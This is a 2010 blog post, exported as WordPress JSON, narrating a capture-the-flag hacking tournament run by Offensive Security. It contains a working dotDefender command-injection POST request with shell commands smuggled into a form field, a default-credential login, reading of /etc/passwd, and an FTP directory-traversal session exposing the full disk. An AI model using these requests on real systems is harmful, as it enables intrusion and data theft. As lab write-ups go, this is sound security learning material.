{"id":3767,"date":"2010-05-10T23:20:00","date_gmt":"2010-05-10T21:20:00","guid":{"rendered":"http:\/\/www.corelan.be:8800\/?p=3767"},"modified":"2010-05-10T23:20:00","modified_gmt":"2010-05-10T21:20:00","slug":"offensive-security-hacking-tournament-how-strong-was-my-fu","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","title":{"rendered":"Offensive Security Hacking Tournament - How strong was my fu ?"},"content":{"rendered":"<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja1.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"margin: 0px 10px 0px 30px; display: inline; border: 0px;\" title=\"corelan_ninja\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png\" alt=\"corelan_ninja\" width=\"106\" height=\"106\" align=\"right\" border=\"0\" \/><\/a> Hi,<\/p>\n<p>Over the last 2 days my friends from Corelan Team and I participated in a <a href=\"http:\/\/www.offensive-security.com\/backtrack\/how-strong-is-your-fu\/\">Hacking Tournament<\/a>, organized by Offensive Security.\u00a0 The primary goals of the tournament are :<\/p>\n<ul>\n<li>be the first one to grab \"secret\" information from a machine and post it to the Tournament Control Panel.<\/li>\n<li>document your findings and submit them to offsec.<\/li>\n<\/ul>\n<p>A lot of people registered for the tournament, so in order to avoid massive overload and bandwidth issues, a few days before the contest would start, all participants were told that they would have to pass a \"n00b\" filter, an \"easy\" phase1 challenge before we could actually VPN into the lab and start the real challenge.<\/p>\n<p>That's the scope.<\/p>\n<p>What follows below, are my personal notes I took during the contest. 
(and in case you were wondering : I registered as \"corelanc0d3r\" (<a href=\"mailto:corelanc0d3r@gmail.com\">corelanc0d3r@gmail.com<\/a>).)<\/p>\n<blockquote><p>Before getting started, it's important to note that I'm not a pentester at all.\u00a0 I just took OffSec's\u00a0 \"Try Harder\" philosophy seriously and tried to \"think out of the box\" instead of relying\/focusing on tools.\u00a0 Let's find out how far I got with this approach.\u00a0 Whether that was enough to break the challenges or not will become clear soon.<\/p><\/blockquote>\n<p>Before the games started, I was hoping there would be a good amount of Windows systems \/ exploit building exercises (and not a lot of Linux systems\/web based apps, because I'm not really strong in those areas).<\/p>\n<p>You can see the scoreboard here and find out how good\/average\/bad I did :\u00a0 http:\/\/scoreboard.information-security-training.com\/scoreboard\/<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>The n00b filter<\/h3>\n<p>In the \"pre-challenge\" exercise (the challenge to filter participants and only allow the first 100 to connect), we were <em>kindly<\/em> requested to find a secret key and use it to register for the tournament Control Panel. 
Upon connecting to the machines hosting the \"secret key\", a simple login form was displayed : (http:\/\/www1.noob-filter.com or http:\/\/www2.noob-filter.com)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image41.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb41.png\" alt=\"image\" width=\"468\" height=\"387\" border=\"0\" \/><\/a><\/p>\n<p>The \"hints and tips\" section of the tournament stated that, in this phase of the tournament, the goal is to get the contents of a file called n00bSecret.txt and use the key inside this file to register for the real labs.\u00a0 Only the first 100 people to get this file\/extract the key from the file would get a seat for the real tournament.<\/p>\n<blockquote><p>The game just started. It's Saturday, 4pm, and I had invited some friends to come over later in the evening...\u00a0 well,\u00a0 in about an hour and a half to be more precise...\u00a0 I still needed to prep some stuff in the kitchen, so I decided to give it my best shot, but at the same time I also realized that if I couldn't get the secret key before my little party started, I probably wouldn't make it in time (=be one of the first 100 people) either.\u00a0 Time pressure \ud83d\ude42 Let's see.<\/p><\/blockquote>\n<p>Back to the login page. Usually, when someone sees a login page during a pentest, there's a big chance they will try to \"log in\" or bypass the login.\u00a0 But in this case, the challenge is about getting a file.<\/p>\n<p>At the same time, the only thing we see is the login page. 
So my initial plan was not to start \"hammering\" on the login page, but rather to see if the form\/login page will give us some information that can be helpful to get access to the system (regardless of whether there is something behind the login page).<\/p>\n<p>Of course, if that wouldn't lead to anything useful, I could still do plan B : bruteforcing files and directories.<\/p>\n<p>I had a quick look at the source (fields, forms, etc) of the login page but there was not much to see.\u00a0 So my next step was to see what kind of error messages I could trigger when doing some simple tests.\u00a0 I decided to start with a simple sql injection attempt (basically just put a single quote in the Username field).<\/p>\n<p>That attempt redirected me to an error page generated by a plugin called dotDefender.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image39.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb39.png\" alt=\"image\" width=\"295\" height=\"179\" border=\"0\" \/><\/a><\/p>\n<p><em>Note : at the time of writing this documentation, it looks like the offsec crew changed the behaviour to block the display of the dotDefender error message :<\/em><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image411.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image41_thumb.png\" alt=\"image\" width=\"468\" height=\"183\" border=\"0\" \/><\/a><\/p>\n<p>Look at the page source of the page :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image110.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 
0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image1_thumb.png\" alt=\"image\" width=\"464\" height=\"230\" border=\"0\" \/><\/a><\/p>\n<p>=&gt; clear reference to \"Applicure\", which is the company that developed dotDefender :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image3.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb3.png\" alt=\"image\" width=\"352\" height=\"231\" border=\"0\" \/><\/a><\/p>\n<p>So from this point forward, it's pretty easy to figure out that dotDefender is installed in the \/dotDefender folder. (Grab yourself a trial version, install it, done... or just Google for it)<\/p>\n<p>Anyways, by navigating into the dotDefender folder, I got a prompt for a username and password (basic authentication request).<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image81.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image8_thumb.png\" alt=\"image\" width=\"480\" height=\"170\" border=\"0\" \/><\/a><\/p>\n<p>The login text says I should try \"admin\" as username.\u00a0 Let's try some obvious combinations.\u00a0 admin\/admin, admin\/1234, admin\/password... bingo !\u00a0 The admin\/password combination worked fine.<\/p>\n<p>That brings us to vulnerability 1 : the username is admin, and the password is \"password\". 
The configuration of an easy-to-guess password (in combination with the fact that the admin account name was displayed on the login form) allows me to get access to the dotDefender Site Management page.\u00a0 This poor configuration would allow unauthorized people to change the dotDefender configuration, potentially allowing them to bypass input restrictions.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image5.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb5.png\" alt=\"image\" width=\"353\" height=\"305\" border=\"0\" \/><\/a><\/p>\n<p>That's nice, but it might not help me bypass the login form, as the \"Stop dotDefender\" button doesn't really seem to do anything.\u00a0 So I did a quick search for vulnerabilities in the dotDefender plugin, and I got this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image6.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb6.png\" alt=\"image\" width=\"275\" height=\"181\" border=\"0\" \/><\/a><\/p>\n<p><a title=\"http:\/\/www.exploit-db.com\/exploits\/10261\" href=\"http:\/\/www.exploit-db.com\/exploits\/10261\">http:\/\/www.exploit-db.com\/exploits\/10261<\/a><\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">An attack looks like:\n\n--------------------\/Request\/--------------------\nPOST \/dotDefender\/index.cgi HTTP\/1.1\nHost: 172.16.159.132\nUser-Agent: Mozilla\/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;\nrv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5\nAccept: 
text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip,deflate\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\nReferer: https:\/\/172.16.159.132\/dotDefender\/index.cgi\nAuthorization: Basic YWRtaW46\nCache-Control: max-age=0\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 95\n\nsitename=dotdefeater&amp;deletesitename=dotdefeater;id;ls -al\n..\/;pwd;&amp;action=deletesite&amp;linenum=15\n\n--------------------\/Response\/--------------------<\/pre>\n<p>So it looks like we can use a specially crafted POST request to execute commands on the file system.<\/p>\n<p>If that is true, we can simply try to\u00a0 \"find\" the secret file on the filesystem and display its contents :<\/p>\n<p>By hooking a web proxy between your browser and the server (or by using a custom request editor such as Burp), we can craft\/manipulate a\u00a0 request and insert the evil payload, basically trying to find the location of the n00bSecret.txt file. 
The fields to alter are<\/p>\n<ul>\n<li>Host<\/li>\n<li>Referer<\/li>\n<li>Authorization<\/li>\n<li>and of course, the command to execute (\"find\" command in this case)<\/li>\n<\/ul>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">POST \/dotDefender\/index.cgi HTTP\/1.1\nHost: www1.noob-filter.com\nUser-Agent: Mozilla\/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko\/20100330 Fedora\/3.5.9-1.fc11 Firefox\/3.5.9\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,\/;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip,deflate\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\nReferer: http:\/\/www1.noob-filter.com\/dotdefender\/index.cgi\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nCache-Control: max-age=0\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 76\n\nsitename=dotdefeater&amp;deletesitename=dotdefeater;find \/ -name n00bSecret.txt;\n&amp;action=deletesite&amp;linenum=15<\/pre>\n<p>Wait until the find operation completes and review the results that are sent back by the server :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image7.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb7.png\" alt=\"image\" width=\"434\" height=\"271\" border=\"0\" \/><\/a><\/p>\n<p>Nice.<\/p>\n<p>I crafted another request, displaying the contents of the file :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image8.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb8.png\" alt=\"image\" width=\"447\" height=\"254\" border=\"0\" 
\/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image44.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image44_thumb.png\" alt=\"image\" width=\"452\" height=\"210\" border=\"0\" \/><\/a><\/p>\n<p>Game over... and my friends just arrived....\u00a0 Perfect timing \ud83d\ude42<\/p>\n<p>&nbsp;<\/p>\n<h4>Conclusions :<\/h4>\n<p>A number of critical vulnerabilities were found :<\/p>\n<ul>\n<li>Weak admin username\/password + display of admin username in the login form of dotDefender.<\/li>\n<li>Access to the dotDefender admin page from the internet.\u00a0 Access to admin pages should be restricted to trusted IPs only.<\/li>\n<li>Access to login forms\/admin pages in general should at least be protected via SSL.<\/li>\n<li>Remote Command Execution vulnerability in the dotDefender plugin, allowing an attacker to steal sensitive information from the system (n00bSecret.txt was just an example. 
You can also get some other files from the system \ud83d\ude42)<\/li>\n<\/ul>\n<p>\/etc\/passwd<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image10.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb10.png\" alt=\"image\" width=\"197\" height=\"147\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>After entering my key in the Scoreboard\/Control Panel login form, I got 25 points and was able to download the VPN files.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image48.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image48_thumb.png\" alt=\"image\" width=\"306\" height=\"162\" border=\"0\" \/><\/a><\/p>\n<p>(don't pay attention to the points - I made the screenshot while working on the last assignment)<\/p>\n<blockquote><p>So far so good, time to party with my friends. I set up the VPN connection and joined my wife and friends to have a little party.<\/p><\/blockquote>\n<p>Update : 11:30pm - friends went home, I'm a bit drunk... 
but ready to start with the real challenge !<\/p>\n<blockquote><p>Note : It took until Sunday evening before the first 100 participants hacked their way through the n00bfilter...\u00a0 So I guess I didn't really have to hurry up after all \ud83d\ude42 Oh well...<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<h3>Target infrastructure<\/h3>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/CTFTarget.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"CTFTarget\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/CTFTarget_thumb.png\" alt=\"CTFTarget\" width=\"379\" height=\"514\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Challenge 1 : killthen00b<\/h3>\n<p>After checking that my VPN connection to the offsec labs still worked (I was assigned IP 192.168.6.114), I decided to start with challenge \"killthen00b\". The machines running this challenge were hosted at IP 192.168.6.70, .71 and .72.<\/p>\n<blockquote><p>Part of the challenge is to deal with the process of reverts. 
Every 30 minutes, the machines get reverted to the previous snapshot, basically removing all of the changes that were applied to the system in the last 30 minutes.<\/p><\/blockquote>\n<p>A quick portscan (not a complete scan - I figured I could still run a full scan while looking at the obvious ports) on one of these 3 machines indicates the following \"Interesting ports\"<\/p>\n<p><strong>TCP Scan :<\/strong><\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">peter@krypt2:~$ nmap -A 192.168.6.70 -nvv\n\nStarting Nmap 5.21 ( http:<span style=\"color: #008000;\">\/\/nmap.org ) at 2010-05-09 12:24 CEST<\/span>\nNSE: Loaded 36 scripts for scanning.\nInitiating Ping Scan at 12:24\nScanning 192.168.6.70 [2 ports]\nCompleted Ping Scan at 12:24, 2.30s elapsed (1 total hosts)\nInitiating Connect Scan at 12:24\nScanning 192.168.6.70 [1000 ports]\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 21\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 993\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 995\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 80\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 143\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 587\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 25\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 110\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 3389\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 7025\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 465\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 7443\/tcp on 192.168.6.70\nDiscovered <span 
style=\"color: #0000ff;\">open<\/span> port 366\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 106\/tcp on 192.168.6.70\nCompleted Connect Scan at 12:24, 6.58s elapsed (1000 total ports)\nInitiating Service scan at 12:24\nScanning 14 services on 192.168.6.70\nCompleted Service scan at 12:24, 22.05s elapsed (14 services on 1 host)<\/pre>\n<p><strong>UDP Scan :<\/strong><\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">Nmap scan report for 192.168.6.70\nHost is up (0.052s latency).\nNot shown: 999 <span style=\"color: #0000ff;\">open<\/span>|filtered ports\nPORT    STATE SERVICE\n137\/udp <span style=\"color: #0000ff;\">open<\/span>  netbios-ns\nMAC Address: 00:50:56:BC:1C:69 (VMware)<\/pre>\n<p>Based on the MAC address, the machine is running as a guest inside VMware.\u00a0 This may be interesting information for a pentester... If he can own the guest, he may be able to attack the (VMware) host system as well.\u00a0\u00a0 Of course, the MAC addresses may be changed on purpose, but that is not relevant at this point.<\/p>\n<p>Let's have a look at the services and see if I can find some obvious issues.<\/p>\n<p>First of all, the tournament Hints\/Help page indicated that the FTP credentials are devil\/killthen00b.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image12.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb12.png\" alt=\"image\" width=\"326\" height=\"164\" border=\"0\" \/><\/a><\/p>\n<p>Since FTP is at the top of the list (see TCP Scan), let's find out if these credentials work :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">peter@krypt2:~$ ftp 
192.168.6.70\nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\nName (192.168.6.70:peter): devil\n331 Password required for devil\nPassword:\n230 User devil logged in.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; pwd\n257 \"<span style=\"color: #8b0000;\">\/MyDocuments<\/span>\" is current directory.\nftp&gt; ls\n200 PORT command successful.\n150 Opening ASCII mode <span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Music\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Pictures\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Videos\n226 Transfer complete.\nftp&gt;<\/pre>\n<p>Ok, credentials work fine.\u00a0 But there's not a lot of information that can be found here. It looks like we are stuck in the My Documents folder<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">257 \"<span style=\"color: #8b0000;\">\/MyDocuments<\/span>\" is current directory.\nftp&gt; cd ..\n550 CWD: Operation not permitted.\nftp&gt;<\/pre>\n<p>&nbsp;<\/p>\n<p>The server banner returns \"Complete FTP server\".\u00a0 A quick search on exploit-db shows that this FTP server (if we can believe the banner of course) may suffer from a directory traversal vulnerability : <a title=\"http:\/\/www.exploit-db.com\/exploits\/11973\" href=\"http:\/\/www.exploit-db.com\/exploits\/11973\">http:\/\/www.exploit-db.com\/exploits\/11973<\/a>.<\/p>\n<p>So let's see if we can break out of the root using the directory traversal vulnerability on this ftp server :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">ftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\nftp&gt; ls\n200 PORT command successful.\n150 Opening ASCII mode 
<span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 04 00:10 AppData\ndr-xrwx--- 1 admin users              0 May 04 00:10 Application Data\ndr-xrwx--- 1 admin users              0 May 04 00:10 Cookies\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Desktop\ndr-xrwx--- 1 admin users              0 May 04 00:10 Documents\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Downloads\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Favorites\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Links\ndr-xrwx--- 1 admin users              0 May 04 00:10 Local Settings\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Music\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Documents\ndr-xrwx--- 1 admin users              0 May 04 00:10 NetHood\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Pictures\ndr-xrwx--- 1 admin users              0 May 04 00:10 PrintHood\ndr-xrwx--- 1 admin users              0 May 04 00:10 Recent\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Saved Games\ndr-xrwx--- 1 admin users              0 May 04 00:10 SendTo\ndr-xrwx--- 1 admin users              0 May 04 00:10 Start Menu\ndr-xrwx--- 1 admin users              0 May 04 00:10 Templates\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Videos\n-r--rr---- 1 admin users         262144 May 04 00:10 NTUSER.DAT\n-r--rr---- 1 admin users         226304 May 04 00:10 ntuser.dat.LOG1\n-r--rr---- 1 admin users              0 May 04 00:10 ntuser.dat.LOG2\n-r--rr---- 1 admin users          65536 May 04 00:10 NTUSER.DAT{6cced2f1-...\n-r--rr---- 1 admin users         524288 May 04 00:10 NTUSER.DAT{6cced2f1-...\n-r--rr---- 1 admin users         524288 May 04 00:10 NTUSER.DAT{6cced2f1-...\n-r--rr---- 1 admin users             20 May 04 00:10 ntuser.ini\n226 Transfer complete.\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\nftp&gt; 
ls\n200 PORT command successful.\n150 Opening ASCII mode <span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 03 23:05 Administrator\ndr-xrwx--- 1 admin users              0 Jul 13 2009 All Users\ndr-xrwx--- 1 admin users              0 Aug 31 2009 Default\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Default User\ndr-xrwx--- 1 admin users              0 May 04 00:06 devil\ndr-xrwx--- 1 admin users              0 May 04 00:08 ftp\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Public\ndr-xrwx--- 1 admin users              0 May 04 00:10 TEMP\n-r--rr---- 1 admin users            174 Jul 13 2009 desktop.ini\n226 Transfer complete.\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\nftp&gt; ls\n200 PORT command successful.\n150 Opening ASCII mode <span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings\ndr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs\ndr-xrwx--- 1 admin users              0 May 03 19:20 Program Files\ndr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData\ndr-xrwx--- 1 admin users              0 May 03 22:51 Python26\ndr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery\ndr-xrwx--- 1 admin users              0 May 06 05:01 surgemail\ndr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information\ndr-xrwx--- 1 admin users              0 May 04 00:10 Users\ndr-xrwx--- 1 admin users              0 May 03 21:28 Windows\n-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat\n-r--rr---- 1 admin users             10 Jun 10 2009 config.<span style=\"color: #0000ff;\">sys<\/span>\n-r--rr---- 1 admin users     2043449344 May 03 23:14 pagefile.<span style=\"color: #0000ff;\">sys<\/span>\n-r--rr---- 
1 admin users       12645888 May 03 05:53 surgemail_installer.exe\n226 Transfer complete.\nftp&gt;<\/pre>\n<p>Nice, so we have access to the entire disk.\u00a0\u00a0 I started downloading most of the files, to see if I would need to analyze them later on.\u00a0 (After all, files such as NTUSER.dat.* may contain sensitive information)<\/p>\n<p>Before continuing, let's look at the other services. Perhaps we can use the fact that we can access the filesystem to get some information about the configuration of these services.<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">Nmap scan report for 192.168.6.70\nHost is up (0.13s latency).\nScanned at 2010-05-09 12:24:15 CEST for 37s\nNot shown: 986 filtered ports\nPORT     STATE SERVICE       VERSION\n21\/tcp   <span style=\"color: #0000ff;\">open<\/span>  ftp\n|_ftp-anon: Anonymous FTP login allowed\n25\/tcp   <span style=\"color: #0000ff;\">open<\/span>  smtp          Surgemail smtpd 3.8k4-4\n|_smtp-commands: EHLO killthen00b. 
Hello example.org (192.168.6.114), AUTH PLAIN LOGIN, ETRN, X-ID 6b696c6c7468656e30306231323732393539363939, SIZE 20971520, HELP\n80\/tcp   <span style=\"color: #0000ff;\">open<\/span>  http          DNews Web Based Manager\n|_http-favicon: Unknown favicon MD5: 803DA8BF442FFF23072386E2B5EF2928\n|_html-title: SurgeMail Welcome Page\n106\/tcp  <span style=\"color: #0000ff;\">open<\/span>  pop3pw        Qualcomm poppassd (Maximum users connected)\n110\/tcp  <span style=\"color: #0000ff;\">open<\/span>  pop3          SurgeMail pop3d 3.8k4-4\n143\/tcp  <span style=\"color: #0000ff;\">open<\/span>  imap          SurgeMail imapd 3.8k4-4\n|_imap-capabilities: UIDPLUS SURGEMAIL IMAP4REV1 IMAP4 XFLDDATA IDLE NAMESPACE QUOTA\n366\/tcp  <span style=\"color: #0000ff;\">open<\/span>  smtp          Surgemail smtpd 3.8k4-4\n465\/tcp  <span style=\"color: #0000ff;\">open<\/span>  ssl\/smtp      Surgemail smtpd 3.8k4-4\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n587\/tcp  <span style=\"color: #0000ff;\">open<\/span>  smtp          Surgemail smtpd 3.8k4-4\n993\/tcp  <span style=\"color: #0000ff;\">open<\/span>  ssl\/imap      SurgeMail imapd 3.8k4-4\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n|_imap-capabilities: UIDPLUS SURGEMAIL IMAP4REV1 IMAP4 ...\n995\/tcp  <span style=\"color: #0000ff;\">open<\/span>  ssl\/pop3      SurgeMail pop3d 3.8k4-4\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_  
